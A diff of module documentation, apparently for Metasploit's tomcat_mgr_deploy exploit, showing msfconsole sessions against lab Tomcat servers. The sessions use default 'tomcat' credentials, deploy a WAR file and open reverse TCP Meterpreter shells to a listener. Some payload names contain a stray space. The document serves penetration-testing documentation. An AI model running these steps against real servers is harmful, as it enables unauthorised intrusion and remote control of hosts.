@@ -32,7 +32,7 @@ For this exploitation, it was changed to simply `manager`.
32
32
3. Exploit:
33
33
34
34
```
35
- msf > use exploit/multi/http/tomcat_mgr_deploy
35
+ msf > use exploit/multi/http/tomcat_mgr_deploy
36
36
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
37
37
rhost => 192.168.2.108
38
38
msf exploit(tomcat_mgr_deploy) > set verbose true
@@ -43,7 +43,7 @@ For this exploitation, it was changed to simply `manager`.
43
43
HttpUsername => tomcat
44
44
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
45
45
lhost => 192.168.2.117
46
- msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
46
+ msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
47
47
payload => java/meterpreter/reverse_tcp
48
48
msf exploit(tomcat_mgr_deploy) > set target 1
49
49
target => 1
@@ -54,21 +54,21 @@ For this exploitation, it was changed to simply `manager`.
54
54
msf exploit(tomcat_mgr_deploy) > check
55
55
[*] 192.168.2.108:8086 The target appears to be vulnerable.
56
56
msf exploit(tomcat_mgr_deploy) > exploit
57
-
58
- [*] Started reverse TCP handler on 192.168.2.117:4444
57
+
58
+ [*] Started reverse TCP handler on 192.168.2.117:4444
59
59
[*] Using manually select target "Java Universal"
60
60
[*] Uploading 6071 bytes as scEYoK0.war ...
61
61
[!] No active DB -- Credential data will not be saved!
62
62
[*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp...
63
63
[*] Undeploying scEYoK0 ...
64
64
[*] Sending stage (49409 bytes) to 192.168.2.108
65
65
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500
66
-
66
+
67
67
meterpreter > sysinfo
68
68
Computer : winxp
69
69
OS : Windows XP 5.1 (x86)
70
70
Meterpreter : java/windows
71
-
71
+
72
72
```
73
73
74
74
### Tomcat 7 (7.0.73)
@@ -96,7 +96,7 @@ Of note, the user was given `manager-gui` permissions by default.
96
96
3. Exploitation:
97
97
98
98
```
99
- msf > use exploit/multi/http/tomcat_mgr_deploy
99
+ msf > use exploit/multi/http/tomcat_mgr_deploy
100
100
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
101
101
rhost => 192.168.2.108
102
102
msf exploit(tomcat_mgr_deploy) > set path /manager/text
@@ -111,23 +111,23 @@ Of note, the user was given `manager-gui` permissions by default.
111
111
lhost => 192.168.2.117
112
112
msf exploit(tomcat_mgr_deploy) > set rport 8087
113
113
rport => 8087
114
- msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
114
+ msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
115
115
payload => java/meterpreter/reverse_tcp
116
116
msf exploit(tomcat_mgr_deploy) > set target 1
117
117
target => 1
118
118
msf exploit(tomcat_mgr_deploy) > check
119
119
[*] 192.168.2.108:8087 The target appears to be vulnerable.
120
120
msf exploit(tomcat_mgr_deploy) > exploit
121
-
122
- [*] Started reverse TCP handler on 192.168.2.117:4444
121
+
122
+ [*] Started reverse TCP handler on 192.168.2.117:4444
123
123
[*] Using manually select target "Java Universal"
124
124
[*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ...
125
125
[!] No active DB -- Credential data will not be saved!
126
126
[*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp...
127
127
[*] Undeploying Cl6t6gurtwIO59zV3Lt6 ...
128
128
[*] Sending stage (49409 bytes) to 192.168.2.108
129
129
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500
130
-
130
+
131
131
meterpreter > sysinfo
132
132
Computer : winxp
133
133
OS : Windows XP 5.1 (x86)
@@ -159,12 +159,12 @@ Of note, the user was given `manager-gui` permissions by default.
159
159
3. Exploitation:
160
160
161
161
```
162
- msf > use exploit/multi/http/tomcat_mgr_deploy
162
+ msf > use exploit/multi/http/tomcat_mgr_deploy
163
163
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
164
164
rhost => 192.168.2.108
165
165
msf exploit(tomcat_mgr_deploy) > set rport 8088
166
166
rport => 8088
167
- msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
167
+ msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
168
168
payload => java/meterpreter/reverse_tcp
169
169
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
170
170
lhost => 192.168.2.117
@@ -178,15 +178,15 @@ Of note, the user was given `manager-gui` permissions by default.
178
178
msf exploit(tomcat_mgr_deploy) > set path /manager/text
179
179
path => /manager/text
180
180
msf exploit(tomcat_mgr_deploy) > exploit
181
-
182
- [*] Started reverse TCP handler on 192.168.2.117:4444
181
+
182
+ [*] Started reverse TCP handler on 192.168.2.117:4444
183
183
[*] Using manually select target "Java Universal"
184
184
[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
185
185
[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
186
186
[*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
187
187
[*] Sending stage (49409 bytes) to 192.168.2.108
188
188
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
189
-
189
+
190
190
meterpreter > sysinfo
191
191
Computer : winxp
192
192
OS : Windows XP 5.1 (x86)
@@ -215,7 +215,7 @@ Of note, the user was given `manager-gui` permissions by default.
215
215
3. Exploit:
216
216
217
217
```
218
- msf > use exploit/multi/http/tomcat_mgr_deploy
218
+ msf > use exploit/multi/http/tomcat_mgr_deploy
219
219
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
220
220
rhost => 192.168.2.156
221
221
msf exploit(tomcat_mgr_deploy) > set rport 8080
@@ -226,15 +226,15 @@ Of note, the user was given `manager-gui` permissions by default.
226
226
HttpUsername => tomcat
227
227
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
228
228
HttpPassword => tomcat
229
- msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle /reverse_tcp
230
- payload => linux/x86/mettle /reverse_tcp
229
+ msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter /reverse_tcp
230
+ payload => linux/x86/meterpreter /reverse_tcp
231
231
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
232
232
lhost => 192.168.2.117
233
233
msf exploit(tomcat_mgr_deploy) > set target 3
234
234
target => 3
235
235
msf exploit(tomcat_mgr_deploy) > exploit
236
-
237
- [*] Started reverse TCP handler on 192.168.2.117:4444
236
+
237
+ [*] Started reverse TCP handler on 192.168.2.117:4444
238
238
[*] Using manually select target "Linux x86"
239
239
[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
240
240
[!] No active DB -- Credential data will not be saved!
@@ -243,7 +243,7 @@ Of note, the user was given `manager-gui` permissions by default.
243
243
[*] Sending stage (335800 bytes) to 192.168.2.156
244
244
[*] Undeploying 9bj4IYa66cSpdK ...
245
245
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
246
-
246
+
247
247
meterpreter > sysinfo
248
248
Computer : Ubuntu14.04
249
249
OS : Ubuntu 14.04 (Linux 4.2.0-27-generic)
@@ -273,15 +273,15 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
273
273
3. Exploit:
274
274
275
275
```
276
- msf > use exploit/multi/http/tomcat_mgr_deploy
276
+ msf > use exploit/multi/http/tomcat_mgr_deploy
277
277
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
278
278
rhost => 192.168.2.118
279
279
msf exploit(tomcat_mgr_deploy) > set rport 8087
280
280
rport => 8087
281
281
msf exploit(tomcat_mgr_deploy) > set target 3
282
282
target => 3
283
- msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle /reverse_tcp
284
- payload => linux/x86/mettle /reverse_tcp
283
+ msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter /reverse_tcp
284
+ payload => linux/x86/meterpreter /reverse_tcp
285
285
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
286
286
lhost => 192.168.2.117
287
287
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
@@ -294,8 +294,8 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
294
294
msf exploit(tomcat_mgr_deploy) > set path /manager/text
295
295
path => /manager/text
296
296
msf exploit(tomcat_mgr_deploy) > exploit
297
-
298
- [*] Started reverse TCP handler on 192.168.2.117:4444
297
+
298
+ [*] Started reverse TCP handler on 192.168.2.117:4444
299
299
[*] Using manually select target "Linux x86"
300
300
[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
301
301
[!] No active DB -- Credential data will not be saved!
@@ -304,7 +304,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
304
304
[*] Transmitting intermediate stager...(106 bytes)
305
305
[*] Sending stage (335800 bytes) to 192.168.2.118
306
306
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
307
-
307
+
308
308
meterpreter > sysinfo
309
309
Computer : 192.168.2.118
310
310
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
@@ -335,15 +335,15 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
335
335
3. Exploit:
336
336
337
337
```
338
- msf > use exploit/multi/http/tomcat_mgr_deploy
338
+ msf > use exploit/multi/http/tomcat_mgr_deploy
339
339
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
340
340
rhost => 192.168.2.118
341
341
msf exploit(tomcat_mgr_deploy) > set rport 8088
342
342
rport => 8088
343
343
msf exploit(tomcat_mgr_deploy) > set target 3
344
344
target => 3
345
- msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle /reverse_tcp
346
- payload => linux/x86/mettle /reverse_tcp
345
+ msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter /reverse_tcp
346
+ payload => linux/x86/meterpreter /reverse_tcp
347
347
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
348
348
lhost => 192.168.2.117
349
349
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
@@ -355,8 +355,8 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
355
355
msf exploit(tomcat_mgr_deploy) > set path /manager/text
356
356
path => /manager/text
357
357
msf exploit(tomcat_mgr_deploy) > exploit
358
-
359
- [*] Started reverse TCP handler on 192.168.2.117:4444
358
+
359
+ [*] Started reverse TCP handler on 192.168.2.117:4444
360
360
[*] Using manually select target "Linux x86"
361
361
[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
362
362
[!] No active DB -- Credential data will not be saved!
@@ -365,7 +365,7 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
365
365
[*] Transmitting intermediate stager...(106 bytes)
366
366
[*] Sending stage (335800 bytes) to 192.168.2.118
367
367
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
368
-
368
+
369
369
meterpreter > sysinfo
370
370
Computer : 192.168.2.118
371
371
OS : Ubuntu 16.04 (Linux 4.4.0-59-generic)
0 commit comments